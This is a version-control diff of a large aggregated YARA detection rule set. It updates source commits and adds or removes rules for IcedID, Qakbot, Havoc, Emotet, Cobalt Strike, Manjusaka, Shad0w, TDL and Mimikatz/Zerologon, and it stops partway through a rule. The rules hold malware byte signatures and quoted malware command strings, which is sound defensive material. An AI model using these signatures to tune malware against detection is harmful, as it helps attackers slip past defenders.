"da657cf87e043a1fdb2ec683de8a7a12acb8c8f1c24034bb376d525c0a1c5740" - score = 75 - quality = 75 - tags = "FILE" - - strings: - $IcedID = {41 0f b6 d3 44 8d 42 01 83 e2 03 41 83 e0 03 42 8a 44 84 40 02 44 94 40 43 32 04 33 42 8b 4c 84 40 41 88 04 1b 83 e1 07 8b 44 94 40 49 ff c3 d3 c8 ff c0 89 44 94 40 83 e0 07} - - condition: - $IcedID -} -rule EMBEERESEARCH_Win_Qakbot_Api_Hashing_Oct_2022 : FILE -{ - meta: - description = "No description has been set in the source file - EmbeeResearch" - author = "@Embee_Research" - id = "b5478404-659d-5b3a-b722-f8ba33875d8a" - date = "2022-11-14" - modified = "2022-12-01" - reference = "https://twitter.com/embee_research/status/1592067841154756610" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_qakbot_api_hashing_oct_2022.yar#L2-L21" - license_url = "N/A" - logic_hash = "595cabd508ee60c5606f965eb9a290ae21ea32af0f56e213f6ce2d2e35dc4e11" - score = 75 - quality = 75 - tags = "FILE" - vendor = "Huntress Labs" - - strings: - $qakbot_hashing = {0f b6 04 39 33 f0 8b c6 c1 ee 04 83 e0 0f 33 34 85 ?? ?? ?? ?? 8b c6 c1 ee 04 83 e0 0f 33 34 85 ?? ?? ?? ?? 41 3b ca} - - condition: - any of them -} -rule EMBEERESEARCH_Win_Havoc_Djb2_Hashing_Routine_Oct_2022 : FILE -{ - meta: - description = "No description has been set in the source file - EmbeeResearch" - author = "embee_research @ HuntressLabs" - id = "cde3e14f-0671-5bcf-93e8-e0a0af9b462c" - date = "2022-10-11" - modified = "2023-10-18" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_havoc_djb2_hashing_routine_oct_2022.yar#L1-L24" - license_url = "N/A" - logic_hash = "9f645480c3d78153186a247440739a1d2e627ec64a4225083bd8db4ad9bd5ef3" - score = 75 - quality = 75 - tags = "FILE" - vendor = "Huntress Research" - - strings: - $dll = {b8 05 15 00 00 0f be 11 48 ff c1 84 d2 74 07 6b c0 21 01 d0 eb ef} - $shellcode = {41 80 f8 60 76 04 41 83 e8 20 6b c0 21 45 0f b6 c0 49 ff c1 44 01 c0 eb c4} - - condition: - ( any of them ) and ( uint16(0)==0x5a4d or uint16(0)==0x00e8 or uint16(0)==0x4856) -} -rule EMBEERESEARCH_Win_Emotet_String_Patterns_Oct_2022 : FILE -{ - meta: - description = "Detection of string hashing routines observed in emotet" - author = "Embee_Research @ HuntressLabs" - id = "fd9c3133-95dc-5dd8-9e94-ed85ad8e1fc7" - date = "2022-10-14" - modified = "2023-10-18" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_emotet_string_patterns_oct_2022.yar#L1-L19" - license_url = "N/A" - logic_hash = "36f4a3fed124b8c25711f706c5b4f1c9b0801c2105cf86077b8c002dd70a6fbc" - score = 75 - quality = 75 - tags = "FILE" - - strings: - $em1 = {45 33 f6 4c 8b d0 48 85 c0 74 64 48 8d 14 b3 4c 8b c0 45 8b de 4c 8b ca 4c 2b cb 49 83 c1 03 49 c1 e9 02 48 3b da 4d 0f 47 ce} - $em2 = {8b cd 49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00 0f b7 c1 c1 e9 10 66 c1 e8 08 4d 8d 40 08 66 41 89 40 fa 0f b6 c1 66 c1 e9 08 66 41 89 40 fc 66 41 89 48 fe 4d 3b d9} - $em3 = {49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00} - $em4 = {8b cb 41 8b d0 d3 e2 41 8b cb d3 e0 03 d0 41 0f be c1 03 d0 41 2b d0 49 ff c2 44 8b c2} - - condition: - uint16(0)==0x5a4d and ( any of them ) -} /* * YARA Rule Set * Repository Name: AvastTI * Repository: https://github.com/avast/ioc - * Retrieval Date: 2024-09-08 - * Git Commit: b48f810c87e91f39068b28dee63bea4014e62aaa + * Retrieval Date: 2024-09-29 + * Git Commit: 5ac3024eda2733c5a81a40ffebae8fda689c586c * Number of Rules: 33 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) * @@ -210927,7 +212844,7 @@ private rule AVASTTI_EXE_PRIVATE : FILE date = "2022-10-05" modified = "2022-10-05" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/Manjusaka/Manjusaka.yar#L9-L13" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/Manjusaka/Manjusaka.yar#L9-L13" license_url = "N/A" logic_hash = "0688672446142f95a22e49a04234cc90b6c9021efeda9ce57034c88d84944663" score = 75 @@ -210946,7 +212863,7 @@ private rule AVASTTI_ELF_PRIVATE date = "2022-10-05" modified = "2022-10-05" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/Manjusaka/Manjusaka.yar#L1-L7" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/Manjusaka/Manjusaka.yar#L1-L7" license_url = "N/A" logic_hash = "eb05e5d53bb8dea91467a76a164542894cdb1355cf3909f56818e27c589344ec" score = 75 @@ -210968,7 +212885,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Dns_Stager_X86 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L1-L26" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L1-L26" license_url = "N/A" logic_hash = "d447fac16f0a712b1c264bc83b4cf2e56e5e98b369617799b981cd75b37c3511" score = 75 @@ -210990,7 +212907,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Smb_Stager_X86 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L28-L57" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L28-L57" license_url = "N/A" logic_hash = "7459bcb0353f114a869aa61adc0229197ca9a1cfce0741dc227fabbeea2afba9" score = 75 @@ -211012,7 +212929,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Tcp_Bind_X86 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L59-L96" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L59-L96" license_url = "N/A" logic_hash = "5c56e1f1d85375f19b6085b3d4654d2d1ba38d3dfcfea66707ca8957a6ed7bf8" score = 75 @@ -211034,7 +212951,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Tcp_Bind_X64 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L98-L133" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L98-L133" license_url = "N/A" logic_hash = "a803a9c76142ccadda5f5c8f6abf78ac9a60523576edf62f4a1600556f4b6261" score = 75 @@ -211056,7 +212973,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Tcp_Reverse_X86 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L135-L164" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L135-L164" license_url = "N/A" logic_hash = "c20de49c3225a7aed8460d0e3cc3bce715c8746fb4313a2faf9da3c8d1d87387" score = 75 @@ -211078,7 +212995,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Tcp_Reverse_X64 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L166-L195" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L166-L195" license_url = "N/A" logic_hash = "58ae5351bac70ab9530cb033d1f6bb90acb6b66df395d59a55d221ef2a2e5dcf" score = 75 @@ -211100,7 +213017,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Http_Stager_X86 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L197-L232" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L197-L232" license_url = "N/A" logic_hash = "d3c74ff363d113d25d9ecca114dd0872487e713a978da4f94f3cccc2e92943ff" score = 75 @@ -211122,7 +213039,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Http_Stager_X64 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L234-L263" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L234-L263" license_url = "N/A" logic_hash = "a89a8e25d894bf7e5c4a10e2a14b78a52543e42fb185667db9f9548f52ef58bf" score = 75 @@ -211144,7 +213061,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Https_Stager_X86 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L266-L303" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L266-L303" license_url = "N/A" logic_hash = "c168b6f2ce35e57cd4c572ce40652261df7af7900beab7ffcdae58113cad88c0" score = 75 @@ -211166,7 +213083,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Https_Stager_X64 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L306-L337" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L306-L337" license_url = "N/A" logic_hash = "cb36d75efcd0e76bf96793863d1aa5145237ec3ce5c7195e679f2e1019d5bbab" score = 75 @@ -211188,7 +213105,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Dns_Stager_X86_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L339-L354" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L339-L354" license_url = "N/A" logic_hash = "3519d2af99a159483ba22cd87907bcc87bea1cfc2fb92f5f0334fff1c385ef00" score = 75 @@ -211210,7 +213127,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Smb_Stager_X86_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L356-L373" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L356-L373" license_url = "N/A" logic_hash = "74c50e1c989167ea6d9309e2b53629c7103484faa809a80e90b7d5c318b2370c" score = 75 @@ -211232,7 +213149,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Tcp_Bind_X86_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L375-L396" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L375-L396" license_url = "N/A" logic_hash = "2c5ac98ffbea197d14cd6e508729885b5f86adbace0a6d978664908e070965cf" score = 75 @@ -211254,7 +213171,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Tcp_Bind_X64_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L398-L418" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L398-L418" license_url = "N/A" logic_hash = "cdd8e0c9bdaf8d7662a118964abdea8eaea6c0e17fe1f20a80497c0c43d496d6" score = 75 @@ -211276,7 +213193,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Tcp_Reverse_X86_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L420-L437" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L420-L437" license_url = "N/A" logic_hash = "5495405ef3a54c960cf27147dce0d25cb298fee84a99415b59bc548c4f64a1e6" score = 75 @@ -211298,7 +213215,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Tcp_Reverse_X64_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L439-L456" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L439-L456" license_url = "N/A" logic_hash = "d7e8fe5d2e07b7a85fadaa432bf345231ac4ddac5458167431403ddfe05467fc" score = 75 @@ -211320,7 +213237,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Http_Stager_X86_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L458-L478" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L458-L478" license_url = "N/A" logic_hash = "b6e19ee9141aa22d73de6d8145257eba7b3b2bb2edc0996591085c84f242ec87" score = 75 @@ -211342,7 +213259,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Http_Stager_X64_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L480-L497" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L480-L497" license_url = "N/A" logic_hash = "f88378749f0da0c66d66b917eeb11a56f083bb487c19c22a230dee4f50e1e309" score = 75 @@ -211364,7 +213281,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Https_Stager_X86_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L499-L520" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L499-L520" license_url = "N/A" logic_hash = "5003ebd545182bb105cdcaaac2105a92cdd99a0178c24eb5ae2888232897aeb5" score = 75 @@ -211386,7 +213303,7 @@ rule AVASTTI_Cobaltstrike_Raw_Payload_Https_Stager_X64_Utf16 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L522-L540" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L522-L540" license_url = "N/A" logic_hash = "dee3eb3353da0179c58a33c3be0af6ad1e6aa9f13e9e6b9821c94f11d209266f" score = 75 @@ -211408,7 +213325,7 @@ rule AVASTTI_Cobaltstrike_Payload_Encoded date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L542-L593" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L542-L593" license_url = "N/A" logic_hash = "03c650b3c1797c03c635e25ea9d1d4589c6a4b31da0a3e48631fa16d0e3a342b" score = 75 @@ -211453,7 +213370,7 @@ rule AVASTTI_Cobaltstrike_Strike_Payload_Xored date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L595-L613" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L595-L613" license_url = "N/A" logic_hash = "532cf38554ad7211fab74d050007f6fe8d63c20e05f21a6737fff12ac92a81d7" score = 75 @@ -211475,7 +213392,7 @@ rule AVASTTI_Cobaltstrike_Beacon_X86 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L615-L632" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L615-L632" license_url = "N/A" logic_hash = "e6328aae5954ac8e3914e65603813ba4f11d97ff91d08a1398e1f71740879463" score = 75 @@ -211500,7 +213417,7 @@ rule AVASTTI_Cobaltstrike_Beacon_X64 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L634-L651" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L634-L651" license_url = "N/A" logic_hash = "7abf5f9a337c60944a52efcc7a16a768652c46843d2da3df2f946dd6e63f9375" score = 75 @@ -211525,7 +213442,7 @@ rule AVASTTI_Cobaltstrike_Beacon_Encoded date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L653-L703" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L653-L703" license_url = "N/A" logic_hash = "f763c0c41a69c6bafb65517d20ef76242bf7b1626d6745d9a1c26772de3ffa26" score = 75 @@ -211570,7 +213487,7 @@ rule AVASTTI_Cobaltstrike_Beacon_Xored_X86 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L705-L726" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L705-L726" license_url = "N/A" logic_hash = "1415c8ab5b4ddd6eb0f561b570358f04f967621dfc6274e0380879563b612c27" score = 75 @@ -211594,7 +213511,7 @@ rule AVASTTI_Cobaltstrike_Beacon_Xored_X64 date = "2021-07-08" modified = "2021-07-08" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/CobaltStrike/yara_rules/cs_rules.yar#L728-L746" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/CobaltStrike/yara_rules/cs_rules.yar#L728-L746" license_url = "N/A" logic_hash = "11e6c8be28325d42f24fb5bb43c0b5fd35990a46857bae7c9940262a33c02a8c" score = 75 @@ -211617,7 +213534,7 @@ rule AVASTTI_Manjusaka_Framework_Go_Build_Id date = "2022-10-05" modified = "2022-10-05" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/Manjusaka/Manjusaka.yar#L15-L62" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/Manjusaka/Manjusaka.yar#L15-L62" license_url = "N/A" hash = "955e9bbcdf1cb230c5f079a08995f510a3b96224545e04c1b1f9889d57dd33c1" hash = "f275ca5129399a521c8cd9754b1133ecd2debcfafc928c01df6bd438522c564a" @@ -211664,7 +213581,7 @@ rule AVASTTI_Manjusaka_Payload_Encoded_Hexstring date = "2022-10-05" modified = "2022-10-05" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/Manjusaka/Manjusaka.yar#L64-L93" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/Manjusaka/Manjusaka.yar#L64-L93" license_url = "N/A" logic_hash = "5c0b83e709baea7db6185d888bfa10bab073eb0eb2f3fb72df2da76fff3f6f22" score = 75 @@ -211694,7 +213611,7 @@ rule AVASTTI_Manjusaka_Payload_Elf date = "2022-10-05" modified = "2022-10-05" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/Manjusaka/Manjusaka.yar#L95-L122" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/Manjusaka/Manjusaka.yar#L95-L122" license_url = "N/A" hash = "0063e5007566e0a7e8bfd73c4628c6d140b332df4f9afbb0adcf0c832dd54c2b" hash = "76eb9af0e2f620016d63d38ddb86f0f3f8f598b54146ad14e6af3d8f347dd365" @@ -211730,7 +213647,7 @@ rule AVASTTI_Manjusaka_Payload_Mz date = "2022-10-05" modified = "2022-10-05" reference = "https://github.com/avast/ioc" - source_url = "https://github.com/avast/ioc/blob/b48f810c87e91f39068b28dee63bea4014e62aaa/Manjusaka/Manjusaka.yar#L124-L161" + source_url = "https://github.com/avast/ioc/blob/5ac3024eda2733c5a81a40ffebae8fda689c586c/Manjusaka/Manjusaka.yar#L124-L161" license_url = "N/A" hash = "6839180bc3a2404e629c108d7e8c8548caf9f8249bbbf658b47c00a15a64758f" hash = "cd0c75638724c0529cc9e7ca0a91d2f5d7221ef2a87b65ded2bc1603736e3b5d" @@ -211771,7 +213688,7 @@ rule AVASTTI_Manjusaka_Payload_Mz * YARA Rule Set * Repository Name: SBousseaden * Repository: https://github.com/sbousseaden/YaraHunts/ - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 71b27a2a7c57c2aa1877a11d8933167794e2b4fb * Number of Rules: 36 * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance) @@ -211781,6 +213698,55 @@ rule AVASTTI_Manjusaka_Payload_Mz * * NO LICENSE SET */ +import "pe" + +rule SBOUSSEADEN_Shad0W_Beacon : FILE +{ + meta: + description = "Shad0w beacon default suspicous strings" + author = "SBousseaden" + id = "e725172d-dd07-5027-ac85-86d366881856" + date = "2020-06-04" + modified = "2020-06-05" + reference = "https://github.com/bats3c/shad0w" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w.yara#L3-L15" + license_url = "N/A" + logic_hash = "9ea7cf72da0d93f607f58b61cc0fb5f3f114d4454101c69b08c59e6b61353550" + score = 75 + quality = 73 + tags = "FILE" + + strings: + $s1 = "LdrLoadD" + $s2 = {53 65 74 50 72 2A 65 73 73 4D} + $s3 = "Policy" + + condition: + uint16(0)==0x5a4d and all of ($s*) and pe.sections[0].name=="XPU0" and pe.imports("winhttp.dll","WinHttpOpen") +} +rule SBOUSSEADEN_TDL_Loader_Bootstrap_Shellcode : FILE +{ + meta: + description = "No description has been set in the source file - SBousseaden" + author = "SBousseaden" + id = "a2adedef-ba38-599f-b52c-e2156aa5ef98" + date = "2020-10-10" + modified = "2020-10-10" + reference = "https://github.com/hfiref0x/TDL" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/tdl_loader_bootstrat_shellcode.yara#L1-L9" + license_url = "N/A" + logic_hash = "14a993b415e330e284503c409ab66445c5e369a21ef0be37297d9c8946b5559b" + score = 75 + quality = 75 + tags = "FILE" + + strings: + $shc1 = {41 B8 54 64 6C 53 48 63 6B 3C 48 03 EB 44 8B 7D 50 41 8D 97 00 10 00 00 41 FF D1} + $shc2 = {41 B8 54 64 6C 53 4C 63 73 3C 4C 03 F3 45 8B 7E 50 41 8D 97 00 10 00 00 41 FF D1 45 33 C9} + + condition: + uint16(0)==0x5a4d and any of ($shc*) +} rule SBOUSSEADEN_Hunt_Common_Credit_Card_Memscrapper : FILE { meta: @@ -211819,7 +213785,32 @@ rule SBOUSSEADEN_Hunt_Common_Credit_Card_Memscrapper : FILE $cc16 = "^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$" condition: - uint16(0)==0x5a4d and 1 of ($cc*) and all of ($api*) + uint16(0)==0x5a4d and 1 of ($cc*) and all of ($api*) +} +rule SBOUSSEADEN_Hunt_Susp_Vhd : FILE +{ + meta: + description = "Virtual hard disk file with embedded PE" + author = "SBousseaden" + id = "14b082b2-c5cd-5f34-85e9-5987650eaacd" + date = "2020-07-13" + modified = "2020-07-13" + reference = "https://github.com/sbousseaden/YaraHunts/" + source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_vhd.yara#L1-L12" + license_url = "N/A" + logic_hash = "4ba2e3f533942b27c1d235be4677afdac774b558429c414043a8e3a609123ad3" + score = 65 + quality = 73 + tags = "FILE" + + strings: + $hvhd = {636F6E6563746978} + $s1 = {4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00} + $s2 = "!This program cannot be run in DOS mode." base64 + $s3 = "!This program cannot be run in DOS mode." xor + + condition: + $hvhd at 0 and any of ($s*) and filesize <=10MB } rule SBOUSSEADEN_Zerlologon_Mimikatz : FILE { @@ -211851,54 +213842,6 @@ rule SBOUSSEADEN_Zerlologon_Mimikatz : FILE condition: uint16(0)==0x5a4d and (1 of ($rch*) and 1 of ($auth*) and 1 of ($pwd*)) and 2 of ($rpc*) } -rule SBOUSSEADEN_APT_Xdsspy_Xdupload : FILE -{ - meta: - description = "No description has been set in the source file - SBousseaden" - author = "SBousseaden" - id = "ae38d017-6420-596c-af29-62f15cfe56b8" - date = "2020-05-10" - modified = "2020-10-05" - reference = "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/" - source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/apt_xdspy_xdupload.yara#L1-L11" - license_url = "N/A" - logic_hash = "648ea81d1b44d8514439683cf2f86a8027f9e1eb64abf76d42347fc2ce9c4e68" - score = 75 - quality = 75 - tags = "FILE" - - strings: - $s1 = "cmd.exe /u /c cd /d \"%s\" & dir /a /-c" wide - $s2 = "commandC_dll.dll" - $s3 = "cmd.exe /u /c del" wide - - condition: - uint16(0)==0x5a4d and 2 of ($s*) -} -import "pe" - -rule SBOUSSEADEN_Gosliver -{ - meta: - description = "No description has been set in the source file - SBousseaden" 